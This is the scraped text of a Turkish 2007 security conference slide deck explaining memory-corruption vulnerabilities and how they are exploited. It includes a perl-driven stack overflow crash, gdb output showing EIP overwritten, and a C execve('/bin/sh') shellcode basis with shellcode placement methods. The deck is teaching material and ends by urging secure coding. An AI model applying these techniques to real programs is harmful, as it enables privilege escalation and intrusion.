Sunuyu indir
Sunum yükleniyor. Lütfen bekleyiniz
1
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Alt Seviye Programlama Hatalarından Kaynaklanan Güvenlik Zaafiyetleri ve İstismar Edilme Yöntemleri Murat Balaban EnderUNIX http://www.enderunix.org/murat/
2
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley SIGSEGV’i önemseyin !!! Program hatası = Güvenlik Zaafiyeti Dizayn sorunu = Güvenlik Zaafiyeti
3
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Bazı önemli güvenlik zafiyetleri Stack overflows Heap overflows Pointer overflows Format string memory disclosure and overflows Integer overflows
4
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Pointer overwrite
5
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Heap Overflow http://community.corest.com/~gera/InsecureProgramming/abo5.html
6
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Stack Overflow http://community.corest.com/~gera/InsecureProgramming/abo1.html
7
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Hata = Açık Neden? | 1 | EBP+16 | 2 | EBP+12 | 3 | EBP+8 |geri donus adresi| EBP+4 | saklanmis ESP | EBP | yerel_degisken_1| EBP-4 | yerel_degisken_2| EBP-8 x = 0; fonksiyon(1, 2, 3); x = 1;
8
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley 0x41 ? [evil@victim evil]$./abo1 `perl -e "print 'A' x 1024"` Segmentation fault (core dumped) [evil@victim evil]$
9
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley 0x41 ? [evil@victim evil]$ gdb -q./abo1./core Core was generated by `./abo1' Program terminated with signal 11, Segmentation fault. #0 0x41414141 in ?? () (gdb) i r eax 0xbff3edf0 -1074532880 ecx 0xfff9f636 -395722 edx 0xbff9fbba -1074136134 ebx 0xd12ff4 13709300 esp 0xbff3ef00 0xbff3ef00 ebp 0x41414141 0x41414141 esi 0xbff3ef84 -1074532476 edi 0xbff3ef10 -1074532592 eip 0x41414141 0x41414141 eflags 0x10282 66178 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) |geri donus adresi| EBP+4 | saklanmis ESP | EBP | buf[255] | EBP-4 | buf[251] | EBP-8
10
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Kabuk kodu (Shellcode) Programın kontrolü ele geçirildikten sonra Bizim tarafımızdan çalışması istenen kod Genellikle kırılan programın haklarına (çoğu kez root) sahip yeni bir UNIX shell çalıştırılır
11
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Kabuk kodu (Shellcode) #include void main() { char *shell[2]; shell[0] = "/bin/sh"; shell[1] = NULL; execve(shell[0], shell, NULL); } =
![SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Kabuk kodu (Shellcode) #include void main() { char *shell[2]; shell[0] = /bin/sh ; shell[1] = NULL; execve(shell[0], shell, NULL); } =](http://images.slideplayer.biz.tr/11/3257000/slides/slide_11.jpg "SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Kabuk kodu (Shellcode) #include void main() { char *shell[2]; shell[0] = /bin/sh ; shell[1] = NULL; execve(shell[0], shell, NULL); } =")
12
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Kabuk kodu (Shellcode)
13
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Shellcode Yerleştirme Kullanıcıdan gelen buffer’ın içine yerleştirme (aleph1) Çevre Değişkenine yerleştirme (murat)
14
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Exploit (sc çevre değişkeninde)
15
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Son Sözler Intermediate çözümlere güvenmeyin Problemi kökünden çözün. Güvenli yazılım yazın, güvenli yazılım kullanın.
16
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Sorular ?
17
SECURITY, AUDIT & CONTROL OF INFORMATION SYSTEMS CONFERENCE 2007 Smart Valley Teşekkürler EnderUNIX – http://www.enderunix.org TUBITAK UEKAE a
Benzer bir sunumlar
